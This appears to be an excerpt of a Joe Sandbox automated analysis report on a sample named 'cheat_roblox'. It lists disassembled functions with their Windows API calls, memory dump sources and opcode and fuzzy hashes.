                                                                                                                    • Part of subcall function 00007FF6E7E2E948: CloseHandle.KERNEL32 ref: 00007FF6E7E2E9B7
                                                                                                                  • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6E7E31ACB
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1339511690.00007FF6E7E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E7E10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1339487646.00007FF6E7E10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339558435.00007FF6E7E58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E6B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E74000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ff6e7e10000_cheat_roblox.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Close$ChangeCriticalDeleteFindHandleNotificationReleaseSectionSemaphore_invalid_parameter_noinfo_noreturn
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1624603282-0
                                                                                                                  • Opcode ID: 706733c944098cb8a605eaf932642e2f84c02d8e7386b9a1576d55af7d044be2
                                                                                                                  • Instruction ID: 9c1fe89c25a8f9a81fd439bc1b7abf0058c1647258c7f77e7463f2faab16848c
                                                                                                                  • Opcode Fuzzy Hash: 706733c944098cb8a605eaf932642e2f84c02d8e7386b9a1576d55af7d044be2
                                                                                                                  • Instruction Fuzzy Hash: 0661C063B16A85A2EE08CB65D5482BC7365FF40F90B144136D7BD8BAD1DF3EE4618309
                                                                                                                  Function 00007FF6E7E1EC9C Relevance: 1.6, APIs: 1, Instructions: 145COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1339511690.00007FF6E7E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E7E10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1339487646.00007FF6E7E10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339558435.00007FF6E7E58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E6B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E74000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ff6e7e10000_cheat_roblox.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3668304517-0
                                                                                                                  • Opcode ID: 89b76225f611734f1827ebf27dd46062ec279a58f062f7148514824cdf62f394
                                                                                                                  • Instruction ID: b980fac78a17e08e71f9943bc009a446e1d3a474aa6038379368a1db02cbbcb0
                                                                                                                  • Opcode Fuzzy Hash: 89b76225f611734f1827ebf27dd46062ec279a58f062f7148514824cdf62f394
                                                                                                                  • Instruction Fuzzy Hash: 8D51D363A0868340FA149B25E4463BD2751FB85BC4F484132EFEE87396CE3EE489C349
                                                                                                                  Function 00007FF6E7E1E7A8 Relevance: 1.6, APIs: 1, Instructions: 118COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00007FF6E7E23EC8: FindClose.KERNELBASE(?,?,00000000,00007FF6E7E30811), ref: 00007FF6E7E23EFD
                                                                                                                  • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6E7E1E993
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1339511690.00007FF6E7E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E7E10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1339487646.00007FF6E7E10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339558435.00007FF6E7E58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E6B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E74000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ff6e7e10000_cheat_roblox.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CloseFind_invalid_parameter_noinfo_noreturn
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1011579015-0
                                                                                                                  • Opcode ID: 7ccb79097edba5c9ff264a6ea3acda2e11d4279ec26602cbe1bb149cda34522a
                                                                                                                  • Instruction ID: 3fcb3ea20ab47e40dbc67874e8d1f5a59a40baceae047a379fcf6550d6be9fa8
                                                                                                                  • Opcode Fuzzy Hash: 7ccb79097edba5c9ff264a6ea3acda2e11d4279ec26602cbe1bb149cda34522a
                                                                                                                  • Instruction Fuzzy Hash: A4518023A186C681FB60CF28D44637D6361FF84B84F440136EAED8BAA5DF2ED445C71A
                                                                                                                  Function 00007FF6E7E21794 Relevance: 1.6, APIs: 1, Instructions: 115COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1339511690.00007FF6E7E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E7E10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1339487646.00007FF6E7E10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339558435.00007FF6E7E58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E6B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E74000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ff6e7e10000_cheat_roblox.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3668304517-0
                                                                                                                  • Opcode ID: bebb0f9c194fdd9831c81a75273c0277ea796a53f9961829cd6454e8fab382d6
                                                                                                                  • Instruction ID: 116722e4e7cd8d265342df6105fc74ed68c5d14db6715766cf77924b44b824c4
                                                                                                                  • Opcode Fuzzy Hash: bebb0f9c194fdd9831c81a75273c0277ea796a53f9961829cd6454e8fab382d6
                                                                                                                  • Instruction Fuzzy Hash: 2D41F763B18AC242EA149B17EA40379A251FB84FC0F448435EFAC8BF5ADF3DD5528345
                                                                                                                  Function 00007FF6E7E22F58 Relevance: 1.6, APIs: 1, Instructions: 100COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1339511690.00007FF6E7E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E7E10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1339487646.00007FF6E7E10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339558435.00007FF6E7E58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E6B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E74000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ff6e7e10000_cheat_roblox.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3668304517-0
                                                                                                                  • Opcode ID: a8ea22521cea6cd4b61983f62ff8cdba4ac10663c0ba25c39cf8fdd3d1c97acc
                                                                                                                  • Instruction ID: a325c2fa91c123ea41fc61e6b68309835762a97b10864c6fcc94d6b689ae81f5
                                                                                                                  • Opcode Fuzzy Hash: a8ea22521cea6cd4b61983f62ff8cdba4ac10663c0ba25c39cf8fdd3d1c97acc
                                                                                                                  • Instruction Fuzzy Hash: 18410363A08B8780EE109B29E5453792361EB84BD8F141134EBED877D9DF3EE481CA59
                                                                                                                  Function 00007FF6E7E4BDF8 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1339511690.00007FF6E7E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E7E10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1339487646.00007FF6E7E10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339558435.00007FF6E7E58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E6B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E74000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ff6e7e10000_cheat_roblox.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: HandleModule$AddressFreeLibraryProc
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3947729631-0
                                                                                                                  • Opcode ID: 5b4d6432c9ab27f48bf344f41163fa66ca8822e5b5ed34cf2c0174bd429b5c6d
                                                                                                                  • Instruction ID: 2209d044b023ed479139b464ade5b147cb627fcbd8d1e5381033bb0a690deefc
                                                                                                                  • Opcode Fuzzy Hash: 5b4d6432c9ab27f48bf344f41163fa66ca8822e5b5ed34cf2c0174bd429b5c6d
                                                                                                                  • Instruction Fuzzy Hash: 6D41C723E1860682FB14DB15E8503782395AFA4B40F445436DAADC76E1EF7FE842D78A
                                                                                                                  Function 00007FF6E7E1129C Relevance: 1.6, APIs: 1, Instructions: 73COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1339511690.00007FF6E7E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E7E10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1339487646.00007FF6E7E10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339558435.00007FF6E7E58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E6B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E74000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ff6e7e10000_cheat_roblox.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Concurrency::cancel_current_taskstd::bad_alloc::bad_alloc
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 680105476-0
                                                                                                                  • Opcode ID: c0d312b4e0c8f4018cd2918558ed466c16d78a5e43cb187cca2cc725d26fc057
                                                                                                                  • Instruction ID: 3de516c2e1e737cc8585c2304123d90ee5c828320170ed9d87b3ad5a94288274
                                                                                                                  • Opcode Fuzzy Hash: c0d312b4e0c8f4018cd2918558ed466c16d78a5e43cb187cca2cc725d26fc057
                                                                                                                  • Instruction Fuzzy Hash: 3221B223A0835185EA149F52E4013796250FB04BF0F690B30DFBE87BC5DE7EE855930A
                                                                                                                  Function 00007FF6E7E12C54 Relevance: 1.6, APIs: 1, Instructions: 66COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1339511690.00007FF6E7E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E7E10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1339487646.00007FF6E7E10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339558435.00007FF6E7E58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E6B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E74000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ff6e7e10000_cheat_roblox.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3668304517-0
                                                                                                                  • Opcode ID: 96c007019e59238e49ac11bf234f461b25543915ad0794badda9ebf011f5a1e9
                                                                                                                  • Instruction ID: c9364ad4d5c87946b46f95c8a9e7b37b7b838723471d11c5f8e72826e9c1b946
                                                                                                                  • Opcode Fuzzy Hash: 96c007019e59238e49ac11bf234f461b25543915ad0794badda9ebf011f5a1e9
                                                                                                                  • Instruction Fuzzy Hash: 67218223B1558662EA08EB20D5553FC6319FF44784F944431E7BD876A2DF3EE8A9C30A
                                                                                                                  Function 00007FF6E7E5124C Relevance: 1.6, APIs: 1, Instructions: 51COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1339511690.00007FF6E7E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E7E10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1339487646.00007FF6E7E10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339558435.00007FF6E7E58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E6B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E74000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ff6e7e10000_cheat_roblox.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3215553584-0
                                                                                                                  • Opcode ID: 9dd5a9e84c18447e56e2265fa04046f11d37b96b7f5b774ce3305aa6458b3f00
                                                                                                                  • Instruction ID: b98bce5254fd08f8ebc0e582cf9e81e01a5dbe9917eeef94522aa7ca0f4b4a81
                                                                                                                  • Opcode Fuzzy Hash: 9dd5a9e84c18447e56e2265fa04046f11d37b96b7f5b774ce3305aa6458b3f00
                                                                                                                  • Instruction Fuzzy Hash: 5B114937A1C786C6E6109B51F44073962A6FF40380F550135EAEDC7696DF3EE801974A
                                                                                                                  Function 00007FF6E7E3FC68 Relevance: 1.5, APIs: 1, Instructions: 45COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00007FF6E7E3F0A4: GetDlgItem.USER32 ref: 00007FF6E7E3F0E3
                                                                                                                    • Part of subcall function 00007FF6E7E3F0A4: ShowWindow.USER32 ref: 00007FF6E7E3F109
                                                                                                                    • Part of subcall function 00007FF6E7E3F0A4: IsDlgButtonChecked.USER32 ref: 00007FF6E7E3F11E
                                                                                                                    • Part of subcall function 00007FF6E7E3F0A4: IsDlgButtonChecked.USER32 ref: 00007FF6E7E3F136
                                                                                                                    • Part of subcall function 00007FF6E7E3F0A4: IsDlgButtonChecked.USER32 ref: 00007FF6E7E3F157
                                                                                                                    • Part of subcall function 00007FF6E7E3F0A4: IsDlgButtonChecked.USER32 ref: 00007FF6E7E3F173
                                                                                                                    • Part of subcall function 00007FF6E7E3F0A4: IsDlgButtonChecked.USER32 ref: 00007FF6E7E3F1B6
                                                                                                                    • Part of subcall function 00007FF6E7E3F0A4: IsDlgButtonChecked.USER32 ref: 00007FF6E7E3F1D4
                                                                                                                    • Part of subcall function 00007FF6E7E3F0A4: IsDlgButtonChecked.USER32 ref: 00007FF6E7E3F1E8
                                                                                                                    • Part of subcall function 00007FF6E7E3F0A4: IsDlgButtonChecked.USER32 ref: 00007FF6E7E3F212
                                                                                                                    • Part of subcall function 00007FF6E7E3F0A4: IsDlgButtonChecked.USER32 ref: 00007FF6E7E3F22A
                                                                                                                  • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6E7E3FD03
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1339511690.00007FF6E7E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E7E10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1339487646.00007FF6E7E10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339558435.00007FF6E7E58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E6B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E74000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ff6e7e10000_cheat_roblox.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ButtonChecked$ItemShowWindow_invalid_parameter_noinfo_noreturn
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 4003826521-0
                                                                                                                  • Opcode ID: 5388564113a85274d6c60b2b121dfa930de7db2fab563a54e0f24e0429eef411
                                                                                                                  • Instruction ID: 3a3674db5d1183f0cc879d763b83b3a6c75e3b4d55c4bb8d804c8a055b829eb0
                                                                                                                  • Opcode Fuzzy Hash: 5388564113a85274d6c60b2b121dfa930de7db2fab563a54e0f24e0429eef411
                                                                                                                  • Instruction Fuzzy Hash: 9C01C863A2468541ED14A764D44A37D6311EFC9794F500731EBFC8ABE6EF2DE1418609
                                                                                                                  Function 00007FF6E7E13AD8 Relevance: 1.5, APIs: 1, Instructions: 39COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1339511690.00007FF6E7E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E7E10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1339487646.00007FF6E7E10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339558435.00007FF6E7E58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E6B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E74000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ff6e7e10000_cheat_roblox.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3668304517-0
                                                                                                                  • Opcode ID: 454a1fcff6e1850c8b97cdd7684a735fd34d2cefc8bc4c1965818da2daadb151
                                                                                                                  • Instruction ID: f3ad0cd5b2cdc185f01d98c19f018e827db291c9fce6d2db29cf53c07c5cad9f
                                                                                                                  • Opcode Fuzzy Hash: 454a1fcff6e1850c8b97cdd7684a735fd34d2cefc8bc4c1965818da2daadb151
                                                                                                                  • Instruction Fuzzy Hash: 6801C0A3E18B8581FA119728E44232D7361FF89790F905331EBFC47AA5EF2EE4458709
                                                                                                                  Function 00007FF6E7E41558 Relevance: 1.5, APIs: 1, Instructions: 38COMMONLIBRARYCODE
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00007FF6E7E41604: GetModuleHandleW.KERNEL32(?,?,?,00007FF6E7E41573,?,?,?,00007FF6E7E4192A), ref: 00007FF6E7E4162B
                                                                                                                  • DloadProtectSection.DELAYIMP ref: 00007FF6E7E415C9
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1339511690.00007FF6E7E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E7E10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1339487646.00007FF6E7E10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339558435.00007FF6E7E58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E6B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E74000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ff6e7e10000_cheat_roblox.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: DloadHandleModuleProtectSection
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2883838935-0
                                                                                                                  • Opcode ID: 902d746097657f35995c40355b3f554eba39218e3fb79a70aefbb70b68ceb6fd
                                                                                                                  • Instruction ID: 7c90558e46eca77ee86c676a286962c11425a5b6e74ddaeb9aea79925b915b29
                                                                                                                  • Opcode Fuzzy Hash: 902d746097657f35995c40355b3f554eba39218e3fb79a70aefbb70b68ceb6fd
                                                                                                                  • Instruction Fuzzy Hash: 2D11CC63E0854781FF609B09E8413B02350AF24348F541034D9EDC62E2FF3EA496978F
                                                                                                                  Function 00007FF6E7E4FA04 Relevance: 1.5, APIs: 1, Instructions: 36memoryCOMMONLIBRARYCODE
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1339511690.00007FF6E7E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E7E10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1339487646.00007FF6E7E10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339558435.00007FF6E7E58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E6B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E74000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ff6e7e10000_cheat_roblox.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AllocateHeap
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1279760036-0
                                                                                                                  • Opcode ID: c4d23aaef5024e3722ccbb242168b3e22d65bf63548bcaacbbf61b8d0a3ba7a1
                                                                                                                  • Instruction ID: 31f7b7a1c103a695e8a7477b2a5459db32ecf26e575d2f56a6e666e19dc4c1f9
                                                                                                                  • Opcode Fuzzy Hash: c4d23aaef5024e3722ccbb242168b3e22d65bf63548bcaacbbf61b8d0a3ba7a1
                                                                                                                  • Instruction Fuzzy Hash: FAF06D53B0960749FE585B66D9113B412909F84F81F0C6430C9EECA3C2FE2EE683721B
                                                                                                                  Function 00007FF6E7E23EC8 Relevance: 1.5, APIs: 1, Instructions: 31COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00007FF6E7E240BC: FindFirstFileW.KERNELBASE ref: 00007FF6E7E2410B
                                                                                                                    • Part of subcall function 00007FF6E7E240BC: FindFirstFileW.KERNEL32 ref: 00007FF6E7E2415E
                                                                                                                    • Part of subcall function 00007FF6E7E240BC: GetLastError.KERNEL32 ref: 00007FF6E7E241AF
                                                                                                                  • FindClose.KERNELBASE(?,?,00000000,00007FF6E7E30811), ref: 00007FF6E7E23EFD
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1339511690.00007FF6E7E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E7E10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1339487646.00007FF6E7E10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339558435.00007FF6E7E58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E6B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E74000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ff6e7e10000_cheat_roblox.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Find$FileFirst$CloseErrorLast
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1464966427-0
                                                                                                                  • Opcode ID: 18fe74ab7ca813274cb64c08179860cc48efc587ad39327f0b25563dc18ddab5
                                                                                                                  • Instruction ID: d3f257058b476e69cbafdf643847d6c1a5da8fd4296258d70f56902fa3405044
                                                                                                                  • Opcode Fuzzy Hash: 18fe74ab7ca813274cb64c08179860cc48efc587ad39327f0b25563dc18ddab5
                                                                                                                  • Instruction Fuzzy Hash: 08F0AF6390C2C285EA209B75F1003B937609B1ABB8F141338EABD472C7CE2DD4958B4A
